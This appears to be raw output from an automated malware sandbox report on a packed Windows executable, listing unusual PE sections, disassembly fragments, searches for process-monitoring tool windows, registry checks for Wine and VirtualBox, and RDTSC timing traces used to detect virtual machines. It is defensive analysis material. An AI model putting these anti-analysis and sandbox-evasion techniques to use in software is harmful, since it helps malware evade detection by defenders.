Source: C:\Users\user\Desktop\4kahanaK78.exeUnpacked PE file: 0.2.4kahanaK78.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bqzwvadu:EW;gbufcztg:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 4kahanaK78.exeStatic PE information: real checksum: 0x1dfb8b should be: 0x1e63ab
Source: 4kahanaK78.exeStatic PE information: section name:
Source: 4kahanaK78.exeStatic PE information: section name: .idata
Source: 4kahanaK78.exeStatic PE information: section name:
Source: 4kahanaK78.exeStatic PE information: section name: bqzwvadu
Source: 4kahanaK78.exeStatic PE information: section name: gbufcztg
Source: 4kahanaK78.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CFE2B5 push esi; ret 0_3_04CFE2BE
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04D02B88 push ss; ret 0_3_04D02B89
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_0041FAB5 push esi; ret 0_2_0041FABE
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00424388 push ss; ret 0_2_00424389
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA00A9 push ebp; ret 0_2_00AA00B8
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA20AE push edx; ret 0_2_00AA20AF
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30A3 push esi; mov dword ptr [esp], 71565726h0_2_00AA311F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30A3 push ecx; mov dword ptr [esp], 47B7968Bh0_2_00AA313C
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30A3 push ecx; mov dword ptr [esp], 7EBFCC00h0_2_00AA315F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30B5 push esi; mov dword ptr [esp], 71565726h0_2_00AA311F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30B5 push ecx; mov dword ptr [esp], 47B7968Bh0_2_00AA313C
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30B5 push ecx; mov dword ptr [esp], 7EBFCC00h0_2_00AA315F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA5085 push 40D1A680h; mov dword ptr [esp], edx0_2_00AA508D
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA5085 push 4E6E7336h; mov dword ptr [esp], esi0_2_00AA50CB
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA5085 push eax; mov dword ptr [esp], esi0_2_00AA5126
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA5085 push 62993451h; mov dword ptr [esp], edx0_2_00AA51CE
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30EE push esi; mov dword ptr [esp], 71565726h0_2_00AA311F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30EE push ecx; mov dword ptr [esp], 47B7968Bh0_2_00AA313C
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30EE push ecx; mov dword ptr [esp], 7EBFCC00h0_2_00AA315F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA00EF push esi; ret 0_2_00AA00FE
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA2CCE push edx; mov dword ptr [esp], 7FFF42A1h0_2_00AA2CE8
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA2CCE push edi; mov dword ptr [esp], ebp0_2_00AA2D17
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA2CCE push ebx; mov dword ptr [esp], 0E0E7393h0_2_00AA2D5D
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA2CCE push ecx; mov dword ptr [esp], edi0_2_00AA2DA9
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA2CCE push 1C1AA486h; mov dword ptr [esp], ebp0_2_00AA2DCB
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA18CC push ebp; ret 0_2_00AA18DB
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30C6 push esi; mov dword ptr [esp], 71565726h0_2_00AA311F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30C6 push ecx; mov dword ptr [esp], 47B7968Bh0_2_00AA313C
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30C6 push ecx; mov dword ptr [esp], 7EBFCC00h0_2_00AA315F
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00A9F8DA push ecx; ret 0_2_00A9F8E9
Source: 4kahanaK78.exeStatic PE information: section name: bqzwvadu entropy: 7.948647238498833

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 81CFD7 second address: 81CFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 81CFDB second address: 81CFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 81CFDF second address: 81CFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 81CFE5 second address: 81CFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 81CFFB second address: 81C8E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b ja 00007F0E05507503h 0x00000011 push dword ptr [ebp+122D16A9h] 0x00000017 jng 00007F0E05507502h 0x0000001d call dword ptr [ebp+122D18E1h] 0x00000023 pushad 0x00000024 ja 00007F0E05507510h 0x0000002a xor eax, eax 0x0000002c jmp 00007F0E05507509h 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 cmc 0x00000036 mov dword ptr [ebp+122D36EAh], eax 0x0000003c clc 0x0000003d mov esi, 0000003Ch 0x00000042 jmp 00007F0E05507509h 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b pushad 0x0000004c jmp 00007F0E05507504h 0x00000051 sub ah, 0000007Bh 0x00000054 popad 0x00000055 jmp 00007F0E055074FFh 0x0000005a lodsw 0x0000005c sub dword ptr [ebp+122D1831h], ebx 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 mov dword ptr [ebp+122D1831h], ebx 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 sub dword ptr [ebp+122D1831h], ecx 0x00000076 nop 0x00000077 jo 00007F0E055074FEh 0x0000007d jng 00007F0E055074F8h 0x00000083 pushad 0x00000084 popad 0x00000085 push eax 0x00000086 pushad 0x00000087 jmp 00007F0E05507504h 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f popad 0x00000090 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 997AB1 second address: 997AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 997AB5 second address: 997ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0E055074FEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 997ACB second address: 997AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF6h 0x00000009 ja 00007F0E05506CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 997AEB second address: 997AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996B1F second address: 996B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996B29 second address: 996B33 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996B33 second address: 996B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996B39 second address: 996B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996B3F second address: 996B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996B43 second address: 996B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DD0 second address: 996DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DD6 second address: 996DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DDA second address: 996DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DDE second address: 996DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DE4 second address: 996DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DED second address: 996DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996DF6 second address: 996DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 996F95 second address: 996FA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E055074F6h 0x00000008 jc 00007F0E055074F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9973AC second address: 9973B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999B61 second address: 999B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b add dword ptr [ebp+122D1B77h], ebx 0x00000011 push 00000000h 0x00000013 call 00007F0E055074FAh 0x00000018 mov ecx, esi 0x0000001a pop ecx 0x0000001b push C7C11652h 0x00000020 push ecx 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999C92 second address: 999CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F0E05506CF0h 0x0000000e mov dx, di 0x00000011 push 00000000h 0x00000013 movsx esi, ax 0x00000016 call 00007F0E05506CE9h 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999DB4 second address: 999DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999DB8 second address: 999DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999DBE second address: 999DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999DC4 second address: 999E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E05506CF7h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 jmp 00007F0E05506CEEh 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F0E05506CF7h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push edi 0x00000029 pushad 0x0000002a jmp 00007F0E05506CEEh 0x0000002f push eax 0x00000030 pop eax 0x00000031 popad 0x00000032 pop edi 0x00000033 pop eax 0x00000034 mov dword ptr [ebp+122D19F2h], esi 0x0000003a lea ebx, dword ptr [ebp+12450A3Dh] 0x00000040 xchg eax, ebx 0x00000041 push ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999ED0 second address: 999F0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F0E05507509h 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f mov edx, dword ptr [ebp+122D35DAh] 0x00000015 push 00000000h 0x00000017 or dword ptr [ebp+122D1B64h], ebx 0x0000001d push E8D5CF71h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999F0C second address: 999F12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999F12 second address: 999F58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E055074F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 172A310Fh 0x00000011 or dword ptr [ebp+122DB4F1h], ebx 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122DB4E1h], eax 0x0000001f push 00000000h 0x00000021 mov edi, 2B3B73E7h 0x00000026 push 00000003h 0x00000028 pushad 0x00000029 sbb eax, 2D67685Eh 0x0000002f jg 00007F0E055074F6h 0x00000035 popad 0x00000036 push FA8B753Ah 0x0000003b jbe 00007F0E05507504h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999F58 second address: 999F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E05506CE6h 0x0000000a popad 0x0000000b xor dword ptr [esp], 3A8B753Ah 0x00000012 adc di, 4836h 0x00000017 mov edi, edx 0x00000019 lea ebx, dword ptr [ebp+12450A48h] 0x0000001f mov di, si 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E05506CEEh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 999F8B second address: 999F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 981BC4 second address: 981C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0E05506CFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E05506CF9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9B940A second address: 9B940F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9B96A5 second address: 9B96CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F0E05506CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9B96CA second address: 9B96D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9B9AF8 second address: 9B9B0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F0E05506CECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9B9FD9 second address: 9BA013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0E055074F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E05507506h 0x00000011 jmp 00007F0E05507508h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA152 second address: 9BA166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0E05506CE6h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F0E05506CE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA166 second address: 9BA16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA16C second address: 9BA176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA176 second address: 9BA184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA184 second address: 9BA19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA19C second address: 9BA1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9BA1A2 second address: 9BA1C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEDh 0x00000007 pushad 0x00000008 jnl 00007F0E05506CE6h 0x0000000e jmp 00007F0E05506CEBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
